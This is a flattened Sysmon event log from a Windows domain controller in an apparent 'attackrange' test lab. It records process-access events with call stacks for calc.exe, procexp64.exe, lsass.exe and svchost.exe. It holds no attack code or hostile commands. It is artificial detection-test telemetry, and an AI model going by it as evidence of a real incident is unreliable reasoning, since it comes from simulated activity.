15:16:57.845{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.845{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.845{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.845{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.845{732C744F-3269-6010-E5A2-00000000A301}45925484C:\Windows\System32\calc.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x8000000000000000791944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.844{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXE"C:\Windows\System32\win32calc.exe" C:\Windows\System32\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7,IMPHASH=83A6FF176255FE0F3F902360860DA5F8{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.execalc.exe 10341000x8000000000000000791943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.829{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.829{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.829{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.829{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.829{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.813{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.813{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.813{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.813{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.813{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.813{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.798{732C744F-3255-6010-D4A2-00000000A301}40245360C:\Windows\system32\svchost.exe{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.798{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.798{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.798{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3269-6010-E5A2-00000000A301}4592C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.782{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 